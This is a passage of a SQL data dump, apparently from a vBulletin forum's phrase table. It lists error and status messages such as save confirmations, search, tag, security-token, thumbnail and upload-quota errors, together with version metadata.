(34736, -1, 'restore_mysql_schema', 'error', 'Restore mysql-schema.php to the install directory then try this action again', 'vbulletin', '', 0, ''),
(34737, -1, 'retrieval_of_remote_file_failed', 'error', 'Retrieval of remote file failed', 'vbulletin', '', 0, ''),
(34738, -1, 'reversed_infraction_successfully', 'error', 'Reversed Infraction Successfully', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34739, -1, 'sameusernamepass', 'error', 'Your password cannot be the same as your username.', 'vbulletin', 'vBulletin Solutions', 1219143144, '3.8.0 Alpha 1'),
(34740, -1, 'saved_access_masks_successfully', 'error', 'Saved Access Masks Successfully', 'vbulletin', '', 0, ''),
(34741, -1, 'saved_administrator_permissions_successfully', 'error', 'Saved Administrator Permissions Successfully', 'vbulletin', '', 0, ''),
(34742, -1, 'saved_announcement_x_successfully', 'error', 'Saved Announcement {1} Successfully', 'vbulletin', '', 0, ''),
(34743, -1, 'saved_attachment_permissions_successfully', 'error', 'Saved Attachment Permissions Successfully', 'vbulletin', 'vBulletin Solutions', 1148072849, '3.6.0 Beta 1'),
(34744, -1, 'saved_attachment_type_x_successfully', 'error', 'Saved Attachment Type {1} Successfully', 'vbulletin', '', 0, ''),
(34745, -1, 'saved_automatic_ban_successfully', 'error', 'Saved Automatic Ban Successfully', 'vbulletin', 'vBulletin Solutions', 1157411074, '3.6.1'),
(34746, -1, 'saved_avatar_successfully', 'error', 'Saved Avatar Successfully', 'vbulletin', '', 0, ''),
(34747, -1, 'saved_bb_code_x_successfully', 'error', 'Saved BB Code {1} Successfully', 'vbulletin', '', 0, ''),
(34748, -1, 'saved_calendar_permissions_successfully', 'error', 'Saved Calendar Permissions Successfully', 'vbulletin', '', 0, ''),
(34749, -1, 'saved_calendar_x_successfully', 'error', 'Saved Calendar {1} Successfully', 'vbulletin', '', 0, ''),
(34750, -1, 'saved_category_x_successfully', 'error', 'Saved Category {1} Successfully', 'vbulletin', '', 0, ''),
(34751, -1, 'saved_custom_field_x_successfully', 'error', 'Saved Custom Field {1} Successfully', 'vbulletin', '', 0, ''),
(34752, -1, 'saved_display_order_successfully', 'error', 'Saved Display Order Successfully', 'vbulletin', '', 0, ''),
(34753, -1, 'saved_faq_x_successfully', 'error', 'Saved FAQ {1} Successfully', 'vbulletin', '', 0, ''),
(34754, -1, 'saved_forum_permissions_successfully', 'error', 'Saved Forum Permissions Successfully', 'vbulletin', '', 0, ''),
(34755, -1, 'saved_forum_x_successfully', 'error', 'Saved Forum {1} Successfully', 'vbulletin', '', 0, ''),
(34756, -1, 'saved_holiday_x_successfully', 'error', 'Saved Holiday {1} Successfully', 'vbulletin', '', 0, ''),
(34757, -1, 'saved_infraction_group_successfully', 'error', 'Saved Infraction Group Successfully', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34758, -1, 'saved_infraction_level_successfully', 'error', 'Saved Infraction Level Successfully', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34759, -1, 'saved_infraction_successfully', 'error', 'Saved Infraction Successfully', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34760, -1, 'saved_language_successfully', 'error', 'Saved Language Successfully', 'vbulletin', '', 0, ''),
(34761, -1, 'saved_language_x_successfully', 'error', 'Saved Language {1} Successfully', 'vbulletin', '', 0, ''),
(34762, -1, 'saved_moderator_x_successfully', 'error', 'Saved Moderator {1} Successfully', 'vbulletin', '', 0, ''),
(34763, -1, 'saved_notice_x_successfully', 'error', 'Saved Notice {1} Successfully', 'vbulletin', 'vBulletin Solutions', 1189782335, '3.6.8'),
(34764, -1, 'saved_option_successfully', 'error', 'Saved Option Successfully', 'vbulletin', '', 0, ''),
(34765, -1, 'saved_option_x_successfully', 'error', 'Saved Option {1} Successfully', 'vbulletin', '', 0, ''),
(34766, -1, 'saved_paymentapi_x_successfully', 'error', 'Saved Payment API {1} Successfully', 'vbulletin', '', 0, ''),
(34767, -1, 'saved_permissions_successfully', 'error', 'Saved Permissions Successfully', 'vbulletin', '', 0, ''),
(34768, -1, 'saved_phrase_x_successfully', 'error', 'Saved Phrase {1} Successfully', 'vbulletin', '', 0, ''),
(34769, -1, 'saved_plugin_successfully', 'error', 'Saved Plugin Successfully', 'vbulletin', '', 0, ''),
(34770, -1, 'saved_post_icon_successfully', 'error', 'Saved Post Icon Successfully', 'vbulletin', '', 0, ''),
(34771, -1, 'saved_prefix_permissions', 'error', 'Saved Prefix Permissions', 'vbulletin', 'vBulletin Solutions', 1216748247, '3.8.0 Alpha 1'),
(34772, -1, 'saved_profile_customizations_successfully', 'error', 'Saved Profile Customizations Successfully', 'vbulletin', 'vBulletin Solutions', 1199377656, '3.7.0 Beta 4'),
(34773, -1, 'saved_profile_picture_successfully', 'error', 'Saved Profile Picture Successfully', 'vbulletin', '', 0, ''),
(34774, -1, 'saved_promotion_successfully', 'error', 'Saved Promotion Successfully', 'vbulletin', '', 0, ''),
(34775, -1, 'saved_reputation_level_x_successfully', 'error', 'Saved Reputation Level {1} Successfully', 'vbulletin', '', 0, ''),
(34776, -1, 'saved_reputation_successfully', 'error', 'Saved Reputation Successfully', 'vbulletin', '', 0, ''),
(34777, -1, 'saved_rssfeed_x_successfully', 'error', 'Saved RSS Feed \'{1}\' Successfully', 'vbulletin', 'vBulletin Solutions', 1149590393, '3.6.0 Beta 1'),
(34778, -1, 'saved_scheduled_task_x_successfully', 'error', 'Saved Scheduled Task {1} Successfully', 'vbulletin', '', 0, ''),
(34779, -1, 'saved_setting_group_x_successfully', 'error', 'Saved Setting Group {1} Successfully', 'vbulletin', '', 0, ''),
(34780, -1, 'saved_setting_x_successfully', 'error', 'Saved Setting {1} Successfully', 'vbulletin', '', 0, ''),
(34781, -1, 'saved_settings_successfully', 'error', 'Saved Settings Successfully', 'vbulletin', '', 0, ''),
(34782, -1, 'saved_signature_picture_successfully', 'error', 'Saved Signature Picture Successfully', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34783, -1, 'saved_signature_successfully', 'error', 'Saved Signature Successfully', 'vbulletin', '', 0, ''),
(34784, -1, 'saved_smilie_successfully', 'error', 'Saved Smilie Successfully', 'vbulletin', '', 0, ''),
(34785, -1, 'saved_style_x_successfully', 'error', 'Saved Style {1} Successfully', 'vbulletin', '', 0, ''),
(34786, -1, 'saved_subscription_x_successfully', 'error', 'Saved Subscription {1} Successfully', 'vbulletin', '', 0, ''),
(34787, -1, 'saved_template_x_successfully', 'error', 'Saved Template {1} Successfully', 'vbulletin', '', 0, ''),
(34788, -1, 'saved_topic_x_successfully', 'error', 'Saved Topic {1} Successfully', 'vbulletin', '', 0, ''),
(34789, -1, 'saved_user_forum_access_successfully', 'error', 'Saved User Forum Access Successfully', 'vbulletin', '', 0, ''),
(34790, -1, 'saved_user_rank_successfully', 'error', 'Saved User Rank Successfully', 'vbulletin', '', 0, ''),
(34791, -1, 'saved_user_title_x_successfully', 'error', 'Saved User Title {1} Successfully', 'vbulletin', '', 0, ''),
(34792, -1, 'saved_user_x_successfully', 'error', 'Saved User {1} Successfully', 'vbulletin', '', 0, ''),
(34793, -1, 'saved_usergroup_leader_x_successfully', 'error', 'Saved Usergroup Leader {1} Successfully', 'vbulletin', '', 0, ''),
(34794, -1, 'saved_usergroup_permissions_successfully', 'error', 'Saved Subscription Permissions Successfully', 'vbulletin', 'vBulletin Solutions', 1146676255, '3.6.0 Beta 1'),
(34795, -1, 'saved_usergroup_x_successfully', 'error', 'Saved Usergroup {1} Successfully', 'vbulletin', '', 0, ''),
(34796, -1, 'saved_x_successfully', 'error', 'Saved {1} Successfully', 'vbulletin', '', 0, ''),
(34797, -1, 'saved_x_y_successfully', 'error', 'Saved {1} {2} Successfully', 'vbulletin', '', 0, ''),
(34798, -1, 'searchdisabled', 'error', 'Searching has been disabled.', 'vbulletin', '', 0, ''),
(34799, -1, 'searchfloodcheck', 'error', 'This forum requires that you wait {1} seconds between searches. Please try again in {2} seconds.', 'vbulletin', '', 0, ''),
(34800, -1, 'searchinvalidterm', 'error', 'The search term you specified ({1}) is under the minimum word length ({2}) and therefore will not be found. Please make this term longer.\r\n\r\nIf this term contains a wildcard, please make this term more specific.
', 'vbulletin', '', 0, ''),
(34801, -1, 'searchnametooshort', 'error', 'Please enter a name longer than 3 characters to do a partial match on.', 'vbulletin', '', 0, ''),
(34802, -1, 'searchnoresults', 'error', 'Sorry - no matches. Please try some different terms.\r\n\r\n{1}', 'vbulletin', '', 0, ''),
(34803, -1, 'searchnoresults_getnew', 'error', 'Sorry, there are no new threads to view. You may search for threads updated during the previous 24 hours, here .', 'vbulletin', '', 0, ''),
(34804, -1, 'searchnoresults_titlesonly', 'error', 'Sorry - no matches. Please try some different terms.\r\n\r\n{1}Your search included threads from which you only have permission to view their titles. You may find further results if you search only the titles of these threads. Click here to do so.
', 'vbulletin', 'vBulletin Solutions', 1210586909, '3.7.1'),
(34805, -1, 'searchspecifyterms', 'error', 'Please specify some words or valid user names to search on. There were no matches for those that you specified.', 'vbulletin', '', 0, ''),
(34806, -1, 'security_alert_hash_mismatch', 'error', 'Security alert: hash mismatch. Please press back, refresh the page, and try again.', 'vbulletin', '', 0, ''),
(34807, -1, 'security_alert_tools_still_exists_in_x', 'error', 'Security Alert! tools.php still remains in the /{1}/ directory. This poses a security risk, so please delete that file immediately. You cannot access the control panel until you do so.', 'vbulletin', '', 0, ''),
(34808, -1, 'security_alert_x_still_exists', 'error', 'Security Alert! \r\n{1} still remains in the /install/ directory. \r\nThis poses a security risk, so please delete that file immediately. You cannot access the control panel until you do so.', 'vbulletin', '', 0, ''),
(34809, -1, 'security_token_guest', 'error', 'Your submission could not be processed because you have logged in since the previous page was loaded. \r\n \r\nPlease push the back button and reload the previous window.', 'vbulletin', 'vBulletin Solutions', 1212160587, '3.8.0 Alpha 1'),
(34810, -1, 'security_token_guest_ajax', 'error', 'Your submission could not be processed because you have logged in since the previous page was loaded. \r\n \r\nPlease reload the window.', 'vbulletin', 'vBulletin Solutions', 1220658170, '3.8.0 Alpha 1'),
(34811, -1, 'security_token_invalid', 'error', 'Your submission could not be processed because a security token was invalid. \r\n \r\nIf this occurred unexpectedly, please inform the administrator and describe the action you performed before you received this error.', 'vbulletin', 'vBulletin Solutions', 1212160421, '3.8.0 Alpha 1'),
(34812, -1, 'security_token_missing', 'error', 'Your submission could not be processed because a security token was missing. \r\n \r\nIf this occurred unexpectedly, please inform the administrator and describe the action you performed before you received this error.', 'vbulletin', 'vBulletin Solutions', 1212160367, '3.8.0 Alpha 1'),
(34813, -1, 'security_token_timeout', 'error', 'Your submission could not be processed because the token has expired. \r\n \r\nPlease push the back button and reload the previous window.', 'vbulletin', 'vBulletin Solutions', 1217249747, '3.8.0 Alpha 1'),
(34814, -1, 'security_token_timeout_ajax', 'error', 'Your submission could not be processed because the token has expired. \r\n \r\nPlease reload the window.', 'vbulletin', 'vBulletin Solutions', 1220658219, '3.8.0 Alpha 1'),
(34815, -1, 'select_valid_dob', 'error', 'You must select a date of birth before you can continue. \r\n \r\nValid years are from 1902 to {1}.', 'vbulletin', 'vBulletin Solutions', 1195232532, '3.7.0 Beta 1'),
(34816, -1, 'session_timed_out_login', 'error', 'Your session timed out while you were composing this post and you were logged out. You must log in again to continue.', 'vbulletin', '', 0, ''),
(34817, -1, 'setting_validation_error_cookietimeout', 'error', 'Setting a cookie timeout shorter than 60 seconds could render your board unusable, as you may not have time to enter the control panel to change the cookie timeout value to something longer before you are logged out.', 'vbulletin', 'vBulletin Solutions', 1160587674, '3.6.3'),
(34818, -1, 'setting_validation_error_globalignore', 'error', 'This field must contain a list of user IDs separated by spaces or be empty. Example, \'1 2 3 4\' ', 'vbulletin', 'vBulletin Solutions', 1156504577, '3.6.1'),
(34819, -1, 'setting_validation_error_rpuserid', 'error', 'Invalid Username', 'vbulletin', 'vBulletin Solutions', 1149695883, '3.6.0 Beta 1'),
(34820, -1, 'setting_validation_error_showvotes', 'error', 'Enter a value greater than 1', 'vbulletin', 'vBulletin Solutions', 1158271350, '3.6.2'),
(34821, -1, 'setting_validation_error_thumbcolor', 'error', 'Color codes must be entered in the format #E67A6D ', 'vbulletin', 'vBulletin Solutions', 1149694632, '3.6.0 Beta 1'),
(34822, -1, 'setting_validation_error_welcomepm', 'error', 'Invalid Username', 'vbulletin', 'vBulletin Solutions', 1149696030, '3.6.0 Beta 1'),
(34823, -1, 'sg_search_field_x_unknown', 'error', 'There was an error: Search field {1} is unknown', 'vbulletin', 'vBulletin Solutions', 1197976360, '3.7.0 Beta 3'),
(34824, -1, 'showemail', 'error', 'The email address for {1} is {2} ', 'vbulletin', '', 0, ''),
(34825, -1, 'sig_bbcode_size_tag_too_big', 'error', 'BB code size value is too big.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34826, -1, 'sig_pic_already_used', 'error', 'You may not use your signature picture more than once.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34827, -1, 'signaturedisabled', 'error', 'Sorry, the administrator has disabled signatures.', 'vbulletin', '', 0, ''),
(34828, -1, 'sigpic_in_use', 'error', 'You may not delete your signature picture while it is in use in your signature.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34829, -1, 'sigtoolong_excludingbbcode', 'error', 'Your signature cannot be longer than {1} characters excluding BB code markup.', 'vbulletin', 'vBulletin Solutions', 1206965706, '3.7.0 Release Candidate 2'),
(34830, -1, 'sigtoolong_includingbbcode', 'error', 'Your signature cannot be longer than {1} characters including BB code markup.', 'vbulletin', 'vBulletin Solutions', 1206965718, '3.7.0 Release Candidate 2'),
(34831, -1, 'sigtoomanylines', 'error', 'Your signature contains too many lines and must be shortened. You may only have up to {1} line(s). Long text may have been implicitly wrapped, causing it to be counted as multiple lines.', 'vbulletin', 'vBulletin Solutions', 1206620816, '3.7.0 Release Candidate 2'),
(34832, -1, 'smilie_categories_dont_support_permissions', 'error', 'Sorry, smilie categories do not support usergroup permissions', 'vbulletin', '', 0, ''),
(34833, -1, 'smilie_replace_text_x_exists', 'error', 'A smilie with the replacement text \'{1} \' already exists. This replacement must be unique.', 'vbulletin', '', 0, ''),
(34834, -1, 'social_bookmarks_disabled', 'error', 'Social bookmarks are globally disabled. No bookmark links will show in threads until the option is enabled here .', 'vbulletin', 'vBulletin Solutions', 1205755819, '3.7.0 Release Candidate 1'),
(34835, -1, 'social_group_category_deleted', 'error', 'Social group category deleted', 'vbulletin', 'vBulletin Solutions', 1215705378, '3.8.0 Alpha 1'),
(34836, -1, 'socialgroupiconsdisabled', 'error', 'The administrator has disabled the use of social group icons.', 'vbulletin', 'vBulletin Solutions', 1216312351, '3.8.0 Alpha 1'),
(34837, -1, 'sorry_no_tables_were_submitted_to_be_renamed', 'error', 'Sorry, no tables were submitted to be renamed.', 'vbulletin', '', 0, ''),
(34838, -1, 'sorry_you_are_not_allowed_to_edit_admin_permissions', 'error', 'Sorry, you are not allowed to edit administrator permissions. If you think you should have permission to access this page, you will need to edit the $config[\'SpecialUsers\'][\'superadministrators\'] variable in the includes/config.php file. To allow the administrators to access this page, edit the variable to include the user IDs of those administrators should have access, separating each user ID with a comma, like this: $config[\'SpecialUsers\'][\'superadministrators\'] = \'1,25,57\';
To allow only a single administrator to access this page, simply add that user\'s ID with no commas, like this: $config[\'SpecialUsers\'][\'superadministrators\'] = \'1\';
', 'vbulletin', '', 0, ''),
(34839, -1, 'source_and_destination_identical', 'error', 'The source and destination users cannot be identical', 'vbulletin', '', 0, ''),
(34840, -1, 'start_date_after_end', 'error', 'Start date is after the end date', 'vbulletin', '', 0, ''),
(34841, -1, 'strikes', 'error', 'Wrong username or password. You have used up your failed login quota! Please wait 15 minutes before trying again. Don\'t forget that the password is case sensitive. Forgotten your password? Click here !', 'vbulletin', '', 0, ''),
(34842, -1, 'style_already_exists', 'error', 'A style called \'{1} \' already exists. - To use this style file, either overwrite the style called \'{1} \', or enter a different title on the upload form.', 'vbulletin', '', 0, ''),
(34843, -1, 'subscription_nofolders', 'error', 'You must first create a custom folder if you wish to be able to move threads to a different folder. You may start by clicking here .', 'vbulletin', 'vBulletin Solutions', 1216205297, '3.8.0 Alpha 1'),
(34844, -1, 'subsnoselected', 'error', 'You did not select any threads.', 'vbulletin', '', 0, ''),
(34845, -1, 'successfully_requested_group_transfer', 'error', 'A transfer request has been sent.', 'vbulletin', 'vBulletin Solutions', 1220980370, '3.8.0 Alpha 1'),
(34846, -1, 'table_status_not_available', 'error', 'Table Status Not Available on MySQL Version {1}', 'vbulletin', '', 0, ''),
(34847, -1, 'tag_add_failed_html', 'error', 'The following errors occurred when trying to add tags to this thread:\r\n\r\nAny changes that did not error have been applied. Click here to return to this thread. ', 'vbulletin', 'vBulletin Solutions', 1196336761, '3.7.0 Beta 1'),
(34848, -1, 'tag_add_failed_plain', 'error', 'Some tags couldn\'t be added for the following reason(s):{1}\r\nChanges that did not cause errors have been applied.', 'vbulletin', 'vBulletin Solutions', 1196350990, '3.7.0 Beta 1'),
(34849, -1, 'tag_exists', 'error', 'This tag already exists.', 'vbulletin', 'vBulletin Solutions', 1190808799, '3.7.0 Beta 1'),
(34850, -1, 'tag_no_censored', 'error', 'You cannot use a tag that contains censored words.', 'vbulletin', 'vBulletin Solutions', 1190899144, '3.7.0 Beta 1'),
(34851, -1, 'tag_no_comma', 'error', 'Tags cannot contain delimiters (such as commas).', 'vbulletin', 'vBulletin Solutions', 1211458540, '3.7.1'),
(34852, -1, 'tag_no_create', 'error', 'You do not have permission to create tags. You may only use existing tags.', 'vbulletin', 'vBulletin Solutions', 1190899168, '3.7.0 Beta 1'),
(34853, -1, 'tag_not_allowed', 'error', 'BB code {1} is not allowed.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34854, -1, 'tag_saved', 'error', 'Tag Saved Successfully', 'vbulletin', 'vBulletin Solutions', 1190808717, '3.7.0 Beta 1'),
(34855, -1, 'tag_too_long_max_x', 'error', 'You specified a tag that was too long. A tag can only be {1} characters.', 'vbulletin', 'vBulletin Solutions', 1190899076, '3.7.0 Beta 1'),
(34856, -1, 'tag_too_short_min_x', 'error', 'You specified a tag that was too short. A tag must be at least {1} characters.', 'vbulletin', 'vBulletin Solutions', 1196252509, '3.7.0 Beta 1'),
(34857, -1, 'tag_x_not_be_common_words', 'error', 'Tags cannot be overly common words ({1}).', 'vbulletin', 'vBulletin Solutions', 1196435117, '3.7.0 Beta 1'),
(34858, -1, 'tags_edited_successfully', 'error', 'Tags Edited Successfully', 'vbulletin', 'vBulletin Solutions', 1198717163, '3.7.0 Beta 4'),
(34859, -1, 'task_not_enabled_product_x_disabled', 'error', 'This scheduled task cannot be enabled. {1} , the product associated with this task, is currently disabled. It must be enabled before this task can be enabled.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34860, -1, 'template_conditional_beginning_missing_x', 'error', 'The conditional on line {1} appears to be missing its beginning tag (<if>). This may cause unexpected behavior. ', 'vbulletin', 'vBulletin Solutions', 1187004075, '3.6.8'),
(34861, -1, 'template_conditional_end_missing_x', 'error', 'The conditional on line {1} appears to be missing its end tag (</if>). The template will not function properly unless this is fixed. ', 'vbulletin', 'vBulletin Solutions', 1150118407, '3.6.0 Beta 2'),
(34862, -1, 'template_history_entries_deleted', 'error', 'Template History Entries Deleted', 'vbulletin', '', 0, ''),
(34863, -1, 'template_x_exists', 'error', 'The template \'{1}\' already exists in this style.', 'vbulletin', '', 0, ''),
(34864, -1, 'test_file_write_failed', 'error', 'We attempted to write a test file to {1} , but we were unsuccessful. Please verify that the web server has write/delete permissions for this path.', 'vbulletin', '', 0, ''),
(34865, -1, 'there_are_no_infraction_levels', 'error', 'There are no infraction levels defined.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34866, -1, 'there_is_already_bb_code_named_x', 'error', 'There is already a BB code tag named \'{1}\'. You may not create duplicate names.', 'vbulletin', 'vBulletin Solutions', 1206965727, '3.7.0 Release Candidate 2'),
(34867, -1, 'there_is_already_faq_item_named_x', 'error', 'There is already a FAQ Item named \'{1}\'. You may not create duplicate names.', 'vbulletin', '', 0, ''),
(34868, -1, 'there_is_already_option_named_x', 'error', 'There is already an option named \'{1}\'. You may not create duplicate names.', 'vbulletin', 'vBulletin Solutions', 1162212355, '3.6.3'),
(34869, -1, 'there_is_already_phrase_named_x', 'error', 'There is already a phrase named \'{1}\'. You may not create duplicate names.', 'vbulletin', '', 0, ''),
(34870, -1, 'there_is_already_prefix_named_x', 'error', 'There is already a prefix named \'{1}\'. You may only have 1 prefix with this name.', 'vbulletin', 'vBulletin Solutions', 1190029321, '3.7.0 Beta 1'),
(34871, -1, 'there_is_already_prefix_set_named_x', 'error', 'There is already a prefix set named \'{1}\'. You may only have 1 prefix set with this name.', 'vbulletin', 'vBulletin Solutions', 1190029344, '3.7.0 Beta 1'),
(34872, -1, 'there_is_already_setting_named_x', 'error', 'There is already a setting named \'{1}\'. You may not create duplicate settings.', 'vbulletin', '', 0, ''),
(34873, -1, 'there_were_errors_encountered_with_your_upload_x', 'error', 'There was an error encountered with your upload: \r\n \r\n', 'vbulletin', '', 0, ''),
(34874, -1, 'this_file_appears_to_be_a_plugin', 'error', 'This file appears to be a Plugin, not a Product. Please use the Plugin Manager to add this file.', 'vbulletin', '', 0, ''),
(34875, -1, 'this_file_appears_to_be_a_product', 'error', 'This file appears to be a Product, not a Plugin. Please use Manage Products to add this file.', 'vbulletin', '', 0, ''),
(34876, -1, 'this_forum_does_not_have_any_moderators', 'error', 'This forum does not have any moderators.', 'vbulletin', '', 0, ''),
(34877, -1, 'this_is_already_option_named_x', 'error', 'There is already an option named \'{1}\'. You may not create duplicate names.', 'vbulletin', '', 0, ''),
(34878, -1, 'this_user_is_already_a_moderator', 'error', 'This User is already a Moderator in the specified Forum.', 'vbulletin', '', 0, ''),
(34879, -1, 'thread_displayip', 'error', 'The IP Address is: {1} \r\nThe host name is: {2} ', 'vbulletin', 'vBulletin Solutions', 1199991017, '3.7.0 Beta 4'),
(34880, -1, 'thread_has_max_allowed_tags', 'error', 'This thread already has the maximum number of tags and you are not allowed to edit any existing tags.', 'vbulletin', 'vBulletin Solutions', 1197895234, '3.7.0 Beta 2'),
(34881, -1, 'thread_is_already_in_the_forum', 'error', 'After much intense calculation, it has been decided that your thread is already in the forum that you wish to move it to.Deep Thought should be jealous. ', 'vbulletin', '', 0, ''),
(34882, -1, 'thread_prefix_required', 'error', 'You must select a thread prefix.', 'vbulletin', 'vBulletin Solutions', 1190039036, '3.7.0 Beta 1'),
(34883, -1, 'threadclosed', 'error', 'Sorry! This thread is closed!', 'vbulletin', '', 0, ''),
(34884, -1, 'threadrateclosed', 'error', 'Sorry you cannot rate closed threads.', 'vbulletin', '', 0, ''),
(34885, -1, 'threadratevoted', 'error', 'According to our records you have already voted on this thread. Changing votes is not allowed.', 'vbulletin', '', 0, ''),
(34886, -1, 'thumbnail_failed_x', 'error', 'Thumbnail creation failed: {1} ', 'vbulletin', '', 0, ''),
(34887, -1, 'thumbnail_nocreateimage', 'error', 'Thumbnail creation failed due to either an invalid image or the wrong version of GD specified in the vBulletin settings.', 'vbulletin', '', 0, ''),
(34888, -1, 'thumbnail_nogetimagesize', 'error', 'Thumbnail creation failed due to inability to obtain image size.', 'vbulletin', '', 0, ''),
(34889, -1, 'thumbnail_nogif', 'error', 'Thumbnail creation failed due to no GIF support in GD.', 'vbulletin', '', 0, ''),
(34890, -1, 'thumbnail_nojpg', 'error', 'Thumbnail creation failed due to no JPG support in GD.', 'vbulletin', '', 0, ''),
(34891, -1, 'thumbnail_nopng', 'error', 'Thumbnail creation failed due to no PNG support in GD.', 'vbulletin', '', 0, ''),
(34892, -1, 'thumbnail_nosupport', 'error', 'Thumbnail creation failed due to your image library not having support for this image type.', 'vbulletin', '', 0, ''),
(34893, -1, 'thumbnail_notcorrectimage', 'error', 'Thumbnail creation failed since the extension of this file is incorrect.', 'vbulletin', '', 0, ''),
(34894, -1, 'thumbnail_notenoughmemory', 'error', 'Thumbnail creation failed due to insufficient memory.', 'vbulletin', '', 0, ''),
(34895, -1, 'title_toolong', 'error', 'The title that you have entered is too long ({1} characters). Please shorten it to {2} characters long.', 'vbulletin', 'vBulletin Solutions', 1159272519, '3.6.2'),
(34896, -1, 'too_many_profile_field_options', 'error', 'You may only specify up to 31 options for checkbox or select_multiple input types. You entered {1} options for this field.', 'vbulletin', 'vBulletin Solutions', 1204733516, '3.7.0 Beta 6'),
(34897, -1, 'toobusy', 'error', 'The server is too busy at the moment. Please try again later.', 'vbulletin', '', 0, ''),
(34898, -1, 'toolong', 'error', 'The text that you have entered is too long ({1} characters). Please shorten it to {2} characters long.', 'vbulletin', '', 0, ''),
(34899, -1, 'toomanyimages', 'error', 'You have included {1} images in your message. You are limited to using {2} images so please go back and correct the problem and then continue again.\r\n \r\n \r\nImages include use of smilies, the BB code [img] tag and HTML <img> tags. The use of these is all subject to them being enabled by the administrator.', 'vbulletin', 'vBulletin Solutions', 1195819614, '3.7.0 Beta 1'),
(34900, -1, 'tooshort', 'error', 'The message you have entered is too short. Please lengthen your message to at least {1} characters.', 'vbulletin', '', 0, ''),
(34901, -1, 'unable_to_delete_file', 'error', 'Unable to delete file', 'vbulletin', '', 0, ''),
(34902, -1, 'unable_to_open_url', 'error', 'Unable to open URL or no data returned.', 'vbulletin', 'vBulletin Solutions', 1151348042, '3.6.0 Beta 4'),
(34903, -1, 'unable_to_read_md5_sums', 'error', 'Unable to read MD5 sums from file includes/md5_sums_vbulletin.php', 'vbulletin', '', 0, ''),
(34904, -1, 'unable_write_backup_file_x', 'error', 'Unable to write backup to file {1}. This file or the directory this file is in must be world writable!', 'vbulletin', '', 0, ''),
(34905, -1, 'under_thirteen_registration_denied', 'error', 'Sorry, we are unable to register your account at this time.', 'vbulletin', 'vBulletin Solutions', 1144876472, '3.6.0 Beta 1'),
(34906, -1, 'unregistereduser', 'error', 'This user has not registered and therefore does not have a profile to view.', 'vbulletin', '', 0, ''),
(34907, -1, 'updated_answer_successfully', 'error', 'Updated Answer Successfully', 'vbulletin', 'vBulletin Solutions', 1192563493, '3.7.0 Beta 1'),
(34908, -1, 'updated_attachment_successfully', 'error', 'Updated Attachment Successfully', 'vbulletin', '', 0, ''),
(34909, -1, 'updated_forum_successfully', 'error', 'Updated Forum Successfully', 'vbulletin', '', 0, ''),
(34910, -1, 'updated_podcast_settings_successfully', 'error', 'Updated Podcast Settings Successfully', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34911, -1, 'updated_post_cache_successfully', 'error', 'Updated Post Cache Successfully', 'vbulletin', '', 0, ''),
(34912, -1, 'updated_post_counts_successfully', 'error', 'Updated Post Counts Successfully', 'vbulletin', '', 0, ''),
(34913, -1, 'updated_question_successfully', 'error', 'Updated Question Successfully', 'vbulletin', 'vBulletin Solutions', 1192563513, '3.7.0 Beta 1'),
(34914, -1, 'updated_reason_successfully', 'error', 'Updated Reason Successfully', 'vbulletin', '', 0, ''),
(34915, -1, 'updated_signature_cache_successfully', 'error', 'Updated Signature Cache Successfully', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(34916, -1, 'updated_similar_threads_successfully', 'error', 'Updated Similar Threads Successfully', 'vbulletin', '', 0, ''),
(34917, -1, 'updated_styles_successfully', 'error', 'Updated Styles Successfully', 'vbulletin', '', 0, ''),
(34918, -1, 'updated_subscription_permissions_successfully', 'error', 'Updated Subscription Permissions Successfully', 'vbulletin', 'vBulletin Solutions', 1146676316, '3.6.0 Beta 1'),
(34919, -1, 'updated_threads_posts_successfully', 'error', 'Updated Threads / Posts Successfully', 'vbulletin', '', 0, ''),
(34920, -1, 'updated_threads_successfully', 'error', 'Updated Threads Successfully', 'vbulletin', '', 0, ''),
(34921, -1, 'updated_user_titles_successfully', 'error', 'Updated User Titles Successfully', 'vbulletin', '', 0, ''),
(34922, -1, 'updated_usernames_successfully', 'error', 'Updated User Names Successfully', 'vbulletin', '', 0, ''),
(34923, -1, 'updateprofilefields', 'error', 'You have empty profile fields that are required to be filled in. Please visit your profile page to update these fields.', 'vbulletin', 'vBulletin Solutions', 1161597565, '3.6.3'),
(34924, -1, 'upload_album_pics_countfull', 'error', 'This picture exceeds your pictures-per-album quota by {1}.', 'vbulletin', 'vBulletin Solutions', 1192541997, '3.7.0 Beta 1'),
(34925, -1, 'upload_album_sizefull', 'error', 'This picture exceeds your total album file size quota by {1}.', 'vbulletin', 'vBulletin Solutions', 1192541954, '3.7.0 Beta 1'),
(34926, -1, 'upload_attach_exists_this_post', 'error', 'Already attached to this post.', 'vbulletin', '', 0, ''),
(34927, -1, 'upload_attach_in_progress', 'error', 'Attachment in Progress.', 'vbulletin', '', 0, ''),
(34928, -1, 'upload_attach_in_progress_delete_here', 'error', 'Attachment in Progress. Can be deleted here .', 'vbulletin', '', 0, ''),
(34929, -1, 'upload_attachexists', 'error', 'You have already attached this file in thread : {3} ', 'vbulletin', '', 0, ''),
(34930, -1, 'upload_attachfull_total', 'error', 'Exceeds forum quota by {1}.', 'vbulletin', '', 0, ''),
(34931, -1, 'upload_attachfull_user', 'error', 'Exceeds your quota by {1}. Click here to view your attachments ', 'vbulletin', '', 0, ''),
(34932, -1, 'upload_copyfailed', 'error', 'Failed to write file. Check disc quotas and permissions for the path: {2}', 'vbulletin', 'vBulletin Solutions', 1181926516, '3.6.8'),
